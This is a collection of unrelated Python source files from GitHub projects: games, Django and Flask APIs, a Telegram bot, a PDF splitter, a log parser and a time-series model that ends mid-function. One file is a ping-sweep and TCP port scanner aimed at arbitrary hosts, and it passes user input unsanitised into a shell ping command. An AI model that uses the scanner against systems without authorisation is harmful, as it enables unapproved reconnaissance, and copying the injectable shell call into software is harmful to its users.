+{"seq_id":"10756801273","text":"from Gera_labirinto_automatico import Gera_labirinto_automatico\r\nfrom Gera_labirinto_manual import Gera_labirinto_manual\r\nfrom Estado import Estado\r\nfrom Gabarito import Gabarito\r\nimport pygame\r\nfrom pygame import mixer\r\n\r\n\r\nspeed = 25\r\nclass interface:\r\n def __init__(self,matriz):\r\n self.altura = matriz.altura\r\n self.largura = matriz.largura\r\n self.matriz = matriz.matriz\r\n self.ponto_Inicial = matriz.ponto_Inicial\r\n self.ponto_Final = matriz.ponto_Final\r\n self.x = matriz.ponto_Inicial.x*25\r\n self.y = matriz.ponto_Inicial.y*25\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((self.largura*25,self.altura*25))\r\n pygame.display.set_caption(\"Labirinto\")\r\n\r\n def game_map(self, instrucao):\r\n \r\n #caminho\r\n caminho = pygame.image.load('chaoClaro.png').convert_alpha()\r\n\r\n #parede\r\n parede = pygame.image.load('parede.png').convert_alpha()\r\n #tracante\r\n chaoEscuro = pygame.image.load('chaoEscuro.png').convert_alpha()\r\n #casa\r\n casa = pygame.image.load('casa.png').convert_alpha()\r\n\r\n pygame.font.init() #instruções\r\n font_instrucoes2 = pygame.font.SysFont('Stencil', 18)\r\n aviso = font_instrucoes2.render(instrucao, 1, (0, 0, 0))\r\n\r\n for y, row in enumerate(self.matriz):\r\n for x, cell in enumerate(row):\r\n if cell == 0:\r\n image = parede\r\n elif cell == 1:\r\n image = caminho\r\n else:\r\n image = chaoEscuro\r\n self.screen.blit(image, [x*25, y*25])\r\n self.screen.blit(casa, [self.ponto_Final.x*25, self.ponto_Final.y*25]) \r\n self.screen.blit(aviso, (self.largura*12.5-260, self.altura*25 - 22)) \r\n pygame.display.update() \r\n\r\n\r\n def player(self):\r\n player = pygame.image.load('raffChao.png').convert_alpha()\r\n self.screen.blit(player, [self.x, self.y]) \r\n\r\n def automatico(self,resposta): ####mudar\r\n\r\n loop = True\r\n i = 0\r\n instrucao = ' RESOLUÇÂO REALIZADA DE FORMA AUTOMÁTICA'\r\n while loop:\r\n pygame.time.delay(100)\r\n \r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n \r\n row = self.y // 25\r\n column = self.x // 25\r\n \r\n if self.matriz[row][column] == 1:\r\n self.matriz[row][column] = 2\r\n pos = self.x, self.y\r\n\r\n if resposta[i]=='left':\r\n self.x -= speed\r\n if resposta[i]=='right':\r\n self.x += speed\r\n if resposta[i]=='up':\r\n self.y -= speed\r\n if resposta[i]=='down':\r\n self.y += speed\r\n\r\n pygame.time.delay(300)\r\n i+=1\r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 0:\r\n self.x, self.y = pos\r\n\r\n self.screen.fill((255,255,255))\r\n interface.game_map(self, instrucao)\r\n interface.player(self)\r\n pygame.display.update()\r\n \r\n if row == self.ponto_Final.y and column == self.ponto_Final.x:\r\n loop = False\r\n\r\n pygame.quit()\r\n\r\n def manual(self):\r\n loop = True\r\n Retorno = False\r\n instrucao = 'TECLE NAS (SETAS) PARA CHEGAR NO ICOMP (BLOCO CINZA)'\r\n movimentos = 0\r\n\r\n while loop:\r\n pygame.time.delay(100)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n movimentos = 0\r\n\r\n #player controls\r\n keys = pygame.key.get_pressed()\r\n \r\n pos = self.x, self.y\r\n\r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 1:\r\n self.matriz[row][column] = 2\r\n\r\n if keys[pygame.K_LEFT]:\r\n self.x -= speed\r\n movimentos += 1\r\n if keys[pygame.K_RIGHT]:\r\n self.x += speed\r\n movimentos += 1\r\n if keys[pygame.K_UP]:\r\n self.y -= speed\r\n movimentos += 1\r\n if keys[pygame.K_DOWN]:\r\n self.y += speed\r\n movimentos += 1\r\n \r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 0:\r\n self.x, self.y = pos\r\n movimentos -=1\r\n\r\n self.screen.fill((255,255,255))\r\n interface.game_map(self, instrucao)\r\n interface.player(self, )\r\n pygame.display.update()\r\n\r\n if row == self.ponto_Final.y and column == self.ponto_Final.x:\r\n loop = False\r\n Retorno = True\r\n\r\n pygame.quit()\r\n return Retorno, movimentos\r\n\r\n def to_execute_Manual(self):\r\n return self.manual()\r\n \r\n def to_execute_Automatico(self):\r\n estadoInicial = Estado(self.matriz,self.ponto_Inicial,self.ponto_Final,0, [])\r\n resposta = Gabarito.caminho_ate_Fim(estadoInicial)\r\n print(resposta)\r\n if (resposta == []):\r\n pygame.quit()\r\n return True, len(resposta)\r\n else:\r\n self.automatico(resposta)\r\n return False, len(resposta)\r\n\r\n#mat =LabirintoManual(27,17)\r\n#mat.manual()\r\n\r\n#print(\"X: {} - Y: {}\".format(mat.po))\r\n#lab = interface(mat)\r\n#lab.to_execute_Automatico()","repo_name":"DanielCardozoSantos/Labirinto","sub_path":"labirinto-main/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18004043416","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\n\n\nfrom . import models, serializers\n\n\n@csrf_exempt\n@api_view([\"GET\"])\n@permission_classes((AllowAny,))\ndef get_lots(request, username):\n \"\"\"Get all lots belonging to a user\"\"\"\n author_object = User.objects.get(username=username)\n author_id = author_object.id\n lots = models.Lot.objects.all().filter(author_id=author_id)\n serializer = serializers.LotSerializer(lots, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view([\"GET\"])\n@permission_classes((AllowAny,))\ndef get_lot(request, id):\n \"\"\"Get specific lot belonging to a user, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n if lot:\n serializer = serializers.LotSerializer(lot)\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"PATCH\"])\n@permission_classes((IsAuthenticated,))\ndef update_lot(request, id):\n \"\"\"Updates lot, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n serializer = serializers.LotSerializer(lot, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"DELETE\"])\n@permission_classes((IsAuthenticated,))\ndef delete_lot(request, id):\n \"\"\"Deletes lot, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n if lot:\n lot.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"POST\"])\n@permission_classes((IsAuthenticated,))\ndef new_lot(request):\n \"\"\"Creates new lot\"\"\"\n user = request.user\n data = request.data\n data['author_id'] = user.id\n serializer = serializers.LotSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"t0ri/builds-api","sub_path":"builds/lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12144456688","text":"\"\"\"Информация о функционале бота.\"\"\"\nfrom configs import log_configured\nfrom telegram import Update\nfrom telegram.ext import ContextTypes\n\nlogger = log_configured.getLogger(__name__)\n\n\nasync def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Логика команды /help.\"\"\"\n if update.effective_chat is not None:\n message: str = (\n 'Бот предназначен для отображения курса рубля по отношению к следующим валютам:\\n'\n '1. Доллар США (USD)\\n'\n '2. Евро (EUR)\\n'\n '3. Китайский юань (CNY)\\n'\n '4. Белорусский рубль (BYN)\\n'\n 'На выбранные валюты можно подписаться (в том числе не на все)'\n )\n\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=message,\n )\n else:\n logger.warning('Не получен ID чата при запросе /help.')\n","repo_name":"McElast/ru_crs_bot","sub_path":"bot_commands/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10467803900","text":"from rest_framework import serializers\n\nfrom users.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n payments = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = ('id', 'first_name', 'last_name', 'email', 'phone', 'city', 'payments', 'is_active')\n ref_name = 'UserSerializer'\n\n def get_payments(self, instance):\n return instance.payment_set.all().select_related('course', 'lesson').values(\n 'date_payment',\n 'amount',\n 'payment_method',\n 'course__title',\n 'lesson__title'\n )\n\n\nclass UserSerializerForPayment(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'first_name', 'email', 'phone', 'city')\n ref_name = 'UserSerializerForPayment'\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'phone', 'city', 'avatar',)\n ref_name = 'UserUpdateSerializer'\n","repo_name":"DmitriiParfenov/lms_system_project","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7042659091","text":"class Solution:\n def isEscapePossible(self, blocked, source, target):\n blocked = set(map(tuple, blocked))\n\n def dfs(x, y, target, seen):\n if not (0 <= x < 10**6 and 0 <= y < 10**6) or (x, y) in blocked or (x, y) in seen: return False\n \n seen.add((x, y))\n if len(seen) > 20000 or [x, y] == target: return True\n return dfs(x + 1, y, target, seen) or \\\n dfs(x - 1, y, target, seen) or \\\n dfs(x, y + 1, target, seen) or \\\n dfs(x, y - 1, target, seen)\n \n return dfs(source[0], source[1], target, set()) and dfs(target[0], target[1], source, set())\n ","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/escape_a_large_maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"25383463846","text":"import os\npath = '/home/yaobo/background/'\n\n\n# 重命名\nfilename_list = os.listdir(path)\na = 0\nj = 1\nfor i in filename_list:\n used_name = path + filename_list[a]\n new_name = path + \"yao_e12_\"+str(j)+'.jpg'\n os.rename(used_name, new_name)\n print(\"文件%s成功命名,新的文件名为%s\" % (used_name, new_name))\n a += 1\n j += 1\n","repo_name":"yaoyaobo/ImageProcessing","sub_path":"图片重命名.py","file_name":"图片重命名.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"24225983745","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nimport PyPDF2\nimport sys\nimport copy\n\ndef printProgress (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 50):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '💃' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\noutput = PdfFileWriter()\ninputFile = \"input.pdf\"\nif len(sys.argv) > 1:\n\tinputFile = sys.argv[1]\n\n\ninput_pdf = PdfFileReader(open(inputFile, \"rb\"))\nskip_pages = [0];\ninput_length = input_pdf.getNumPages()\nprint(\"file \" + inputFile + \" is read successfully with \" + str(input_length) + \" pages\")\n\nfor i in range(input_length):\n\tif i in skip_pages:\n\t\toutput.addPage(input_pdf.getPage(i))\n\telse:\n\t\t# page_left = PyPDF2.pdf.PageObject.createBlankPage()\n\t\t# page_right = PyPDF2.pdf.PageObject.createBlankPage()\n\t\t# page_left.mergePage(input_pdf.getPage(i))\n\t\t# page_right.mergePage(input_pdf.getPage(i))\n\t\tpage_left = input_pdf.getPage(i)\n\t\tpage_right = copy.copy(page_left)\n\t\t\n\t\tpage_right.mediaBox.upperRight = (\n\t\t\tpage_right.mediaBox.getUpperRight_x()/2,\n\t\t\tpage_right.mediaBox.getUpperRight_y()\n\t\t)\n\t\tpage_left.mediaBox.upperLeft = (\n\t\t\tpage_left.mediaBox.getUpperRight_x()/2,\n\t\t\tpage_left.mediaBox.getUpperRight_y()\n\t\t)\n\t\toutput.addPage(page_left)\n\t\toutput.addPage(page_right)\n\tprintProgress(i, input_length)\noutputFile = \"output.pdf\"\nprint(\"finished successfully! writing file\")\nif len(sys.argv) > 2:\n\toutputFile = sys.argv[2]\noutput.write(open(outputFile, \"wb\"))\nprint(\"file written successfully\")\n\n","repo_name":"romaad/pdf-manipulator","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"635141042","text":"import os\r\nimport json\r\nimport argparse\r\nimport requests\r\nimport socket\r\n\"\"\" ввод аргументов\"\"\"\r\n# Пример команды запуска под windows:py scanner_for_win.py -i 77.222.40.29 -n 3 scan\r\nparser = argparse.ArgumentParser(description='Network scanner')\r\nparser.add_argument('task', choices=['scan', 'sendhttp'], default='scan', help='Network scan or send HTTP request')\r\nparser.add_argument(\r\n '-i', # краткая форма аргумента\r\n '--ip', # полное имя аргумента\r\n type=str,\r\n default='192.168.2.1', # значение по умолчанию, если не передан аргумент\r\n help='IP address'\r\n )\r\nparser.add_argument('-n', '--num_of_hosts', type=int, help='кол-во хостов')\r\nparser.add_argument('-t', '--target', type=str, help='Выбрать домен.Target')\r\nparser.add_argument('-m', '--method', choices=['GET', 'POST'], type=str, help='Method (GET|POST)')\r\nparser.add_argument('-hd', '--headers', type=str, help='Headers (name1:value1 name2:value2 ...)')\r\nargs = parser.parse_args()\r\n# Для тестирования без ввода аргументов\r\n# task = 'scan'\r\n# ip = '77.222.40.29'\r\n# num_of_hosts = 3\r\n\"\"\" функция сканер ip \"\"\"\r\ndef do_ping_sweep(ip, num_of_host):\r\n ip_parts = ip.split('.')\r\n network_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'\r\n scanned_ip = network_ip + str(int(ip_parts[3]) + num_of_host)\r\n response = os.popen(f'ping -n 1 {scanned_ip}')\r\n #response = os.popen(f'ping -n -c 1 {scanned_ip}') # Под линукс\r\n res = response.readlines()\r\n if \"TTL\" in res[2]:\r\n ip_ok.append(scanned_ip)\r\n #print(f\"[#] Result of scanning: {scanned_ip} [#]\\n{res[2]}\", end='\\n')\" # Под Линукс\r\n print(f\"[#] Result of scanning: {scanned_ip} [#]\\n{res[2].encode('cp1251').decode('cp866')}\", end='\\n') #Под Windows\r\n\r\n\"\"\" функция запроса к домену\"\"\"\r\ndef sent_http_request(target, method, headers=None, payload=None):\r\n headers_dict = dict()\r\n if headers:\r\n for header in headers:\r\n header_name = header.split(\":\")[0]\r\n header_value = header.split(\":\")[1:]\r\n headers_dict[header_name] = \":\".join(header_value)\r\n\r\n if method == \"GET\":\r\n response = requests.get(target, headers=headers_dict)\r\n elif method == \"POST\":\r\n response = requests.post(target, headers=headers_dict, data=payload)\r\n print(\r\n f\"[#] Response status code: {response.status_code}\\n\"\r\n f\"[#] Response headers: {json.dumps(dict(response.headers), indent=4, sort_keys=True)}\\n\"\r\n f\"[#] Response content:\\n {response.text}\"\r\n )\r\n\r\n\"\"\"Сканер портов\"\"\"\r\ndef port_scanner(host, port):\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((host, port))\r\n return True\r\n except:\r\n return False\r\n\r\n\"\"\"выбор режима работ сканера \"\"\"\r\nip_ok = []\r\npayload = \"\"\r\nif args.task == 'scan':\r\n for host_num in range(args.num_of_hosts):\r\n do_ping_sweep(args.ip, host_num)\r\nelse:args.task == 'sendhttp'\r\n# target = str(input(\"Выбрать домен.Target:\"))\r\n# method = str(input(\"Method (GET|POST):\"))\r\n# headers = list(input(\"Headers (name1:value1 name2:value2 ...)\").split())\r\nheaders = args.headers\r\npayload = \"\"\r\n#if args.method == \"POST\":\r\n #payload = str(input(\"Payload:\"))\r\nsent_http_request(args.target, args.method, headers, payload)\r\n#elif sent_http_request(args.target, args.method, args.headers):\r\n\r\nprint(\"Список ответивших хостов:\\n\", ip_ok) # Список ответивших ip\r\n\r\n\"\"\" выбор портов и хостов для сканирования\"\"\"\r\nif input(\"Просканировать порты обнаруженных хостов - \"\"1\"\". Ввести новый хост вручную -\"\"2\"\" : \") == \"1\":\r\n host = ip_ok\r\nelse:\r\n host = input(\"Enter the host to be scanned: \").split()\r\n ip_ok = host\r\nport_start = int(input(\"Enter start of the port range: \"))\r\nport_end = int(input(\"Enter end of the port range: \"))\r\nopen_ports = []\r\nfor host in ip_ok:\r\n print(host)\r\n for port in range(port_start, port_end+1):\r\n if port_scanner(host, port):\r\n open_ports.append(port)\r\n if open_ports:\r\n print(\"Open ports:\", open_ports)\r\n open_ports = []\r\n else:\r\n print(\"No open ports found.\")\r\n\r\n","repo_name":"mspb1/mspb","sub_path":"scanner_for_win.py","file_name":"scanner_for_win.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4884504539","text":"\"\"\"Parsing Log Files\"\"\"\nimport re\nimport collections\n\nFILE_NAME = 'access_log.log'\n\n\ndef find_most_requests(data):\n \"\"\"\n Returns list of 10 clients of this server requesting the largest\n number of pages\n :param data:\n :return: list\n \"\"\"\n reg = r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n list_ip = re.findall(reg, data)\n counter_ip = collections.Counter(list_ip)\n return counter_ip.most_common(10)\n\n\ndef find_popular_platforms(data):\n \"\"\"\n Returns 5 most popular platforms (OS) for launching web browsers\n :param data:\n :return: list\n \"\"\"\n reg = r'((Linux|Windows|Macintosh|Unix|iPhone OS).*?)(?=\\))'\n list_group = re.findall(reg, data)\n list_os = [item[0] for item in list_group]\n counter_ip = collections.Counter(list_os)\n return counter_ip.most_common(5)\n\n\ndef main():\n \"\"\"\n Opens logfile, runs and print find_most_requests() and\n find_popular_platforms()\n :return:\n\n \"\"\"\n try:\n with open(FILE_NAME, 'r') as f:\n data = f.read()\n print(find_most_requests(data))\n print(find_popular_platforms(data))\n except FileNotFoundError:\n print(\"No such file or directory:\", FILE_NAME)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Mari1234Med/FunctionalPractice","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30727108577","text":"N = int(input()) # 테스트 케이스 갯수\nfor i in range(N):\n words = input() # 단어 입력\n check_word = \"\" # 뒤집을 단어\n for j in range(len(words)-1, -1, -1): #단어 뒤집어서 만들어주기\n check_word += words[j]\n if words == check_word: # 같으면 1반환\n print(f\"#{i+1} 1\")\n else: # 다르면 0반환\n print(f\"#{i+1} 0\")","repo_name":"DHKim95/TIL","sub_path":"Algorithm Study/SWEA/D2/SWEA_1989.py","file_name":"SWEA_1989.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2789241854","text":"# Import necessary libraries\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\nfrom flask import Flask, jsonify\n\n# Create engine\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Create base\nBase = automap_base()\n\n# Connect base to engine\nBase.prepare(engine, reflect=True)\n\n# Create connection to measurement class\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create required routes\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef welcome():\n return (\n f\"Welcome to the Climate App API! \"\n f\"Available Routes: \"\n f\"/api/v1.0/precipitation \"\n f\"/api/v1.0/stations \"\n f\"/api/v1.0/tobs \"\n f\"/api/v1.0/START_DATE \"\n f\"Please type your start date in YYYY-MM-DD format to retrieve min, avg and max of observed temperatures. \"\n f\"/api/v1.0/START_DATE/END_DATE \"\n f\"Please type your start date and end date in YYYY-MM-DD/YYYY-MM-DD format to retrieve min, avg and max of observed temperatures.\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n most_active_station = session.query(Station.station, Station.name, func.count(Measurement.tobs)).\\\n filter(Measurement.station == Station.station).\\\n group_by(Station.station).\\\n order_by(func.count(Measurement.tobs).desc()).first()[0]\n\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.station == most_active_station).all()\n\n session.close()\n\n date_prcp = []\n\n for date, prcp in results:\n prcp_dict = {}\n prcp_dict['Date'] = date\n prcp_dict['Precipitation'] = prcp\n date_prcp.append(prcp_dict)\n\n return jsonify(date_prcp)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n results = session.query(Station.station).all()\n\n session.close()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n most_active_station = session.query(Station.station, Station.name, func.count(Measurement.tobs)).\\\n filter(Measurement.station == Station.station).\\\n group_by(Station.station).\\\n order_by(func.count(Measurement.tobs).desc()).first()[0]\n\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.station == most_active_station).all()\n\n session.close()\n\n tobs_list = []\n\n for date, tobs in results:\n tobs_dict = {}\n tobs_dict['Temperature Observation (F)'] = tobs\n tobs_list.append(tobs_dict)\n\n return jsonify(tobs_list)\n\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n #Create Session\n session = Session(engine)\n\n # Query results\n\n dates = session.query(Measurement.date).all()\n\n dates = list(np.ravel(dates))\n \n if start in dates:\n calc_start = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).all()\n\n session.close()\n \n\n result = list(np.ravel(calc_start))\n\n result_dict = {'Min Temperature (F)': result[0], 'Avg Temperature (F)': result[1], 'Max Temperature (F)': result[2]}\n\n return jsonify(result_dict)\n else:\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. The date you search for is not within the data set. '\n f'2. You have not typed the date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n\n@app.route(\"/api/v1.0//\")\ndef start_end_date(start, end):\n #Create Session\n session = Session(engine)\n\n # Query results\n\n dates = session.query(Measurement.date).all()\n\n dates = list(np.ravel(dates))\n \n if start in dates:\n if end in dates:\n\n calc_start = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n\n session.close()\n \n result = list(np.ravel(calc_start))\n\n result_dict = {'Min Temperature (F)': result[0], 'Avg Temperature (F)': result[1], 'Max Temperature (F)': result[2]}\n\n return jsonify(result_dict)\n else:\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. The end date you search for is not within the data set. '\n f'2. You have not typed the end date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. The start date you search for is not within the data set. '\n f'2. You have not typed the start date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"alexturkmen/Climate-Analysis-Using-SQLAlchemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29611745647","text":"from scipy.stats import skew, kurtosis, shapiro\nimport seaborn as sns\n\nimport statsmodels\nimport statsmodels.api as sm\nfrom statsmodels.tsa.stattools import coint, adfuller\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, mean_absolute_percentage_error\n\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX, SARIMAXResults\n\nfrom pmdarima import auto_arima\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\nimport matplotlib.dates as mdates\nimport scipy.stats\nimport pylab\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler, MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport math\nimport sys\nimport warnings\nimport pickle\n\nclass arimaModel:\n def __init__(self, datapath, category_name):\n warnings.filterwarnings(\"always\", category=UserWarning, module='arimaModel')\n # This will be used to search for the reading files in the directory.\n self.datapath = datapath\n folderName = \"Model_incercam9_\" + category_name\n self.folderPath = self.create(folderName)\n self.modelName = \"arima_\"+category_name+'.pkl'\n self.df = pd.read_csv(datapath)\n \n self.df['time'] = pd.to_datetime(self.df['time'])\n self.df = self.df.sort_values('time')\n self.df = self.df.set_index('time')\n \n def create(self, dirName):\n if not os.path.exists('../' + dirName):\n os.mkdir('../' + dirName)\n print(\"Directory \" , dirName , \" Created \")\n else: \n print(\"Directory \" , dirName , \" already exists\")\n \n return os.path.abspath('../' + dirName)\n\n # Data is standardized in order to allow application of models that are sensitive to scale, like neural networks or svm.\n # Remember that distribution shape is maintained, it only changes first and second momentum (mean and standard deviation)\n def normalize(self, df):\n ss_1 = StandardScaler()\n df_2 = pd.DataFrame(ss_1.fit_transform(df), index = df.index, columns = df.columns)\n return(df_2,ss_1)\n \n def norm_tra(self, df_1, ss_x):\n df_2 = pd.DataFrame(ss_x.transform(df_1), index = df_1.index, columns = df_1.columns)\n return(df_2)\n\n def split_data(self, s_df):\n\n df_train = s_df[s_df.index < \"2018-04-01\"]\n df_test = s_df[s_df.index >= \"2018-04-01\"]\n \n return df_train, df_test\n\n\n def fit_ARIMA(self, x_train, y_train):\n exogenous_features = set(x_train.columns.values) - set(['movave_3', 'movstd_3', 'movave_7', 'movstd_7', 'movave_30', 'movstd_30', 'q10', 'q50', 'q90'])\n exogenous_features = list(exogenous_features)\n print(\"exogenous features: \", exogenous_features)\n\n #model = auto_arima(y_train.avg, exogenous=x_train[exogenous_features], trace=True, error_action=\"ignore\",\n #suppress_warnings=True, seasonal = True, m=48, start_p = 0, max_p = 2, max_q = 5, maxiter = 15, max_P=2, max_Q = 2, d = 0, D = 1)\n #model = ARIMA(endog = y_train.avg, exog = exogenous_features, order =[1,0,3], seasonal_order = [0,1,0,48])\n model= SARIMAX(y_train.avg,\n freq = '30T',\n exog=x_train[exogenous_features],\n order=(0,0,0),\n seasonal_order = (1,1,1,48),\n enforce_invertibility=False, enforce_stationarity=False, simple_differencing = False)\n fit = model.fit(maxiter=50)\n return fit #model\n\n \n def predict(self, model, x_test, y_test, ss):\n exogenous_features = set(x_test.columns.values) - set(['movave_3', 'movstd_3', 'movave_7', 'movstd_7', 'movave_30', 'movstd_30', 'q10', 'q50', 'q90'])\n exogenous_features = list(exogenous_features)\n #forecast, confint = model.predict(len(x_test), exogenous = x_test[exogenous_features], return_conf_int = True)\n #new_model = model.append(endog = y_test.avg, exog = x_test[exogenous_features], refit = False)\n fcast = model.get_forecast(steps = len(x_test), index = y_test.index, freq = '30T', exog = x_test[exogenous_features])\n #fc, se, conf = model.forecast(len(x_test), exog = x_test[exogenous_features], alpha=0.05) # 95% conf\n #res = pd.DataFrame(index = x_test.index)\n #res['Forecast_ARIMAX'] = forecast\n #res['forecast_normal'] = res['Forecast_ARIMAX'] #ss.inverse_transform(res['Forecast_ARIMAX'].values.reshape(-1, 1))\n #fc_series = pd.Series(fc, index=y_test.index)\n #lower_series = pd.Series(conf[:, 0], index=y_test.index)\n #upper_series = pd.Series(conf[:, 1], index=y_test.index)\n #cf= pd.DataFrame(confint, index = res.index)\n\n return fcast #res, cf\n\n def residual_analysis(self, df_valid):\n residuals=df_valid.avg-df_valid.forecast_normal\n\n self.dicky_fuller_test(residuals, 0.05)\n\n residuals.plot()\n plt.savefig(self.folderPath + '/residual_analysis.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n def print_corr(self, s_df, col='avg'):\n correlations = s_df.corr(method='pearson')\n print(correlations[col].sort_values(ascending=False).to_string())\n\n def evaluation(self, df_valid, model):\n RMSE = 0\n MAE = 0\n MAPE = 0\n days = 0\n for i in range(48, len(df_valid), 48):\n RMSE_d = np.sqrt(mean_squared_error(df_valid.iloc[(i-48):i].avg, df_valid.iloc[(i-48):i].forecast_normal))\n MAE_d = mean_absolute_error(df_valid.iloc[(i-48):i].avg, 